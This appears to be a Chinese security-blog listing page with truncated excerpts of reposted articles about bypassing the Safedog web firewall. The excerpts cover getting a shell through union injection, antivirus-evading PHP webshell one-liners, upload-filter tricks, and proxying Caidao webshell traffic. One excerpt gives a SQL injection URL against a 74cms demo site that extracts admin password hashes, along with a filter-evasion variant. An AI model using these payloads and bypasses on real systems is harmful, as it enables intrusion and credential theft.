-
文章转载自90sec
过程:从写漏洞代码 到搭建安全狗 再到 研究安全狗绕过方式 再到用菜刀连接安全狗
1.讲师操作:联合注入绕过安全狗4.0 一条龙 从注入到getshell(成功)
2.讲师操作:联合注入绕过安全狗3.5 (失败)
3.学员操作:安全狗3.5直接getshell(成功)
视频总时长:5小时 日期:2018年9月13号
——–2.联合注入绕过安全狗4.0一条龙(成功).mp4
——–3...阅读全文
-
转自90sec@phithon
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(...阅读全文
-
提交:
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23
被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢
然后提交
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin...阅读全文
-
首发自 08安全团队(www.08sec.com)
此方法只试用于 V3.1 06103 (截至发稿前为最新版本)
V3.1 05837 或小于V3.1 05837绕过方法请查阅:
http://www.08sec.com/thread-2007-1-1.html
我们有专门绕过安全狗的技术小组,最新绕过安全狗系列的方法请关注我们www.08sec.com
测试环境:windows 2003 + iis 6.0
测试步骤:
1.网站安全狗防御状态开启
2.Burp拦截POST包后进行修改
3.是的,你没...阅读全文
-
首发自 08安全团队(www.08sec.com)
此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103
ps:此方法已经提交到安全狗安全应急响应中心
绕过网站安全狗 V3.1 06103办法稍后会继续公布出来,请关注我们的消息 www.08sec.com
测试环境:windows 2003 + iis 6.0
测试步骤:
1.确认安全狗功能正常以及版本
2.使用Burp截取上传后进行改包,将后缀改为
08sec.php.
3.审查测试结...阅读全文
-
0x00 安全狗之菜刀的突破
#原理:
BAD: caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao
菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内
但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去
类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,...阅读全文
文章转载自90sec 过程:从写漏洞代码 到搭建安全狗 再到 研究安全狗绕过方式 再到用菜刀连接安全狗 1.讲师操作:联合注入绕过安全狗4.0 一条龙 从注入到getshell(成功) 2.讲师操作:联合注入绕过安全狗3.5 (失败) 3.学员操作:安全狗3.5直接getshell(成功) 视频总时长:5小时 日期:2018年9月13号 ——–2.联合注入绕过安全狗4.0一条龙(成功).mp4 ——–3...阅读全文抢沙发
提交: http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢 然后提交 http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin...阅读全文![[原创首发]绕过最新版网站安全狗3.1 上传](https://www.hedysx.com/wp-content/themes/hicms/images/random/tb14.jpg "[原创首发]绕过最新版网站安全狗3.1 上传")
首发自 08安全团队(www.08sec.com) 此方法只试用于 V3.1 06103 (截至发稿前为最新版本) V3.1 05837 或小于V3.1 05837绕过方法请查阅: http://www.08sec.com/thread-2007-1-1.html 我们有专门绕过安全狗的技术小组,最新绕过安全狗系列的方法请关注我们www.08sec.com 测试环境:windows 2003 + iis 6.0 测试步骤: 1.网站安全狗防御状态开启 2.Burp拦截POST包后进行修改 3.是的,你没...阅读全文![[原创首发]绕过网站安全狗3.1 上传](https://www.hedysx.com/wp-content/themes/hicms/images/random/tb1.jpg "[原创首发]绕过网站安全狗3.1 上传")
首发自 08安全团队(www.08sec.com) 此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103 ps:此方法已经提交到安全狗安全应急响应中心 绕过网站安全狗 V3.1 06103办法稍后会继续公布出来,请关注我们的消息 www.08sec.com 测试环境:windows 2003 + iis 6.0 测试步骤: 1.确认安全狗功能正常以及版本 2.使用Burp截取上传后进行改包,将后缀改为 08sec.php. 3.审查测试结...阅读全文
0x00 安全狗之菜刀的突破 #原理: BAD: caidao -> safedog -X-> backdoor GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao 菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内 但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去 类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,...阅读全文
cheap coach to great yarmouth:
password:
Mxaol:
zedong:
cyl1053995738:
tbcode:
20130112:
forget:
大耳朵:
yahoho: